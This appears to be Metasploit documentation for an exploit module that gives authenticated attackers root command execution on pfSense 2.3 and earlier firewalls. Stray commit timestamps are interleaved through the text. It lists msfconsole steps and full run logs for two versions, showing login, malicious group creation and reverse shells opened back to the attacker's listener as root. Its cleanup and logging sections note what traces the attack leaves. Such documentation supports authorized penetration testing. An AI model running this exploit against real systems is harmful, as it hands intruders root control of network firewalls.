2017-11-15 21:00:58 -05:00
## Description
This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands
as root.
2017-11-19 08:28:07 -05:00
This module has been tested successfully on version 2.3-RELEASE, and 2.2.6.
2017-11-15 21:00:58 -05:00
## Vulnerable Application
2017-11-19 08:28:07 -05:00
This module has been tested successfully on version CE 2.3 amd64, and 2.2.6 amd64.
2017-11-15 21:00:58 -05:00
Installer:
* [pfSense CE 2.3 ](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz )
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/http/pfsense_group_member_exec`
3. Do: `set rhost [IP]`
4. Do: `set username [username]`
5. Do: `set password [password]`
6. Do: `exploit`
7. You should get a session
2020-01-16 11:15:06 -05:00
## Scenarios
2017-11-15 21:00:58 -05:00
2017-11-19 08:28:07 -05:00
### 2.3-Release amd64
2017-11-15 21:00:58 -05:00
```
[*] Processing pfsense.rc for ERB directives.
resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec
2017-11-19 08:28:07 -05:00
resource (pfsense.rc)> set rhost 2.2.2.2
rhost => 2.2.2.2
2017-11-15 21:00:58 -05:00
resource (pfsense.rc)> set verbose true
verbose => true
2017-11-19 08:28:07 -05:00
resource (pfsense.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
2017-11-15 21:00:58 -05:00
resource (pfsense.rc)> check
2017-11-19 08:28:07 -05:00
[*] 2.2.2.2:443 The target service is running, but could not be validated.
2017-11-15 21:00:58 -05:00
resource (pfsense.rc)> exploit
2017-11-19 08:28:07 -05:00
[*] Started reverse double SSL handler on 1.1.1.1:4444
[*] CSRF Token for login: sid:a11be2ee5849522898e2c1ff23739b35c76435bf,1510545358;ip:d70924f708189287bdee1e08d7fa83758a0e1f68,1510545358
2017-11-15 21:00:58 -05:00
[*] Successful Authentication
2017-11-19 08:28:07 -05:00
[*] pfSense Version Detected: 2.3-RELEASE
2017-11-15 21:00:58 -05:00
[+] Login Successful
2017-11-19 08:28:07 -05:00
[*] CSRF Token for group creation: sid:823a6f854ad1bae307c2959e95ccc98a8d72f2c1,1510545361
[*] Manual removal of group aJPEfJLDKT is required.
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5ER6rqZOjOSGjRml;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "5ER6rqZOjOSGjRml\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:25824) at 2017-11-19 08:15:00 -0500
2017-11-15 21:00:58 -05:00
whoami
root
uname -a
FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016 root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense amd64
```
2017-11-19 08:28:07 -05:00
### 2.2.6 amd64
```
[*] Processing pfsense.rc for ERB directives.
resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec
resource (pfsense.rc)> set rhost 3.3.3.3
rhost => 3.3.3.3
resource (pfsense.rc)> set verbose true
verbose => true
resource (pfsense.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (pfsense.rc)> check
[*] 3.3.3.3:443 The target is not exploitable.
resource (pfsense.rc)> exploit
[*] Started reverse double SSL handler on 1.1.1.1:4444
[*] CSRF Token for login: sid:bb80526160efcf79d8660d1a31f6bf88e154b38e,1511091712;ip:42d05b73fc9b2d31c54333a60fd308dfbd4da97a,1511091712
[*] Successful Authentication
[*] pfSense Version Detected: 2.2.6-RELEASE
[+] Login Successful
[*] CSRF Token for group creation: sid:d49a6dc5b7e98c92a7772c605af3586a1f3adc75,1511091715
[*] Manual removal of group okUPTvzysL is required.
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7hKg6oD9DkwXYRtt;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7hKg6oD9DkwXYRtt\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (1.1.1.1:4444 -> 3.3.3.3:34403) at 2017-11-19 06:42:00 -0500
whoami
root
uname -a
FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
```
## Cleanup
Manual cleanup is required. The group name is printed during exploitation.
## Logging
Logging into the web interface writes a line to the system out on the console similar to: `pfSense php-fpm[72834]: /index.php: Succeessful login for user 'admin' from [ip]`
